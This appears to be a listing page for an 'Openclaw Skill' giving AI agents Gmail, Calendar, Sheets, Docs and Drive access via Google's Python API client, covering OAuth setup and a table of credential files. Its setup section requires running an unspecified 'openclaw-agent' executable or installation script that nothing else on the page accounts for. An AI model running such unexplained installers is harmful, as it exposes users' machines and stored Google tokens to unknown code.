What is Google Workspace?

The Google Workspace skill is a robust set of Openclaw Skills designed to give AI agents direct access to the most essential Google services. It allows for the programmatic management of communications, schedules, and documents, enabling a high degree of automation for administrative and developmental workflows. By leveraging the Google API Python Client, this skill facilitates seamless data exchange between your local environment and the cloud.

This integration is particularly valuable for developers looking to build autonomous agents that can respond to emails, organize meetings, or generate reports dynamically. By incorporating these Openclaw Skills into your project, you reduce the friction of manual context switching and allow your agent to act as a fully functional virtual assistant within the Google ecosystem.

Google Workspace Use Cases

  • Automating the drafting and sending of emails based on specific triggers or queries.
  • Programmatically scheduling, updating, and deleting calendar events for team coordination.
  • Reading from and writing to Google Sheets to maintain logs, databases, or financial trackers.
  • Creating and formatting Google Docs for automated report generation or documentation.
  • Managing file lifecycles in Google Drive, including secure uploads and downloads.

How Google Workspace Works

  1. The AI agent initiates a request which requires interaction with a Google Workspace service.
  2. The system verifies that the openclaw-agent is running locally to facilitate secure API communication.
  3. On the initial execution, the skill triggers an OAuth 2.0 flow, requiring the user to authorize access via a web browser.
  4. Authentication credentials are saved locally in a token.pickle file for subsequent headless operations.
  5. The skill executes Python-based commands using the google-api-python-client to perform specific actions like searching Gmail or appending rows to a Sheet.
  6. The Google API response is parsed and returned to the agent to continue the requested workflow.

Google Workspace Setup

First, ensure you have the necessary dependencies installed using pip:

pip install google-api-python-client google-auth-httplib2 google-auth-oauthlib

You must have the openclaw-agent utility active on your system. Windows users should run the provided executable, while macOS users should run the terminal installation script.

Next, configure your Google Cloud Project:

  1. Enable the Gmail, Calendar, Sheets, Docs, and People APIs in the Google Cloud Console.
  2. Create OAuth 2.0 Desktop App credentials and download the credentials.json file to your workspace.
  3. Use the provided authentication helper script to generate your local token.pickle through a one-time browser login.

Google Workspace Data Schema & Taxonomy

The skill utilizes a combination of local configuration files and remote resource identifiers to manage data:

Data Component Format Purpose
credentials.json JSON Stores OAuth 2.0 client IDs and secrets for API access.
token.pickle Binary Stores the user's access and refresh tokens for persistent sessions.
SPREADSHEET_ID String Unique ID found in the Google Sheets URL for targeted data entry.
DOCUMENT_ID String Unique identifier for specific Google Docs resources.
MESSAGE_ID String Unique string used to retrieve, read, or delete specific Gmail messages.
FILE_ID String Unique identifier for Google Drive files and folders.

Google Workspace Advanced Features

  • Support for complex Gmail filters and search queries including labels and attachment flags.
  • Batch processing for Google Docs allows for multiple text replacements in a single API call.
  • MediaIoBaseDownload implementation for efficient, chunked file downloads from Google Drive.
  • Detailed attendee management and reminder overrides for Google Calendar event creation.
  • Capability to create and manage multiple spreadsheets with custom properties and sheet names.
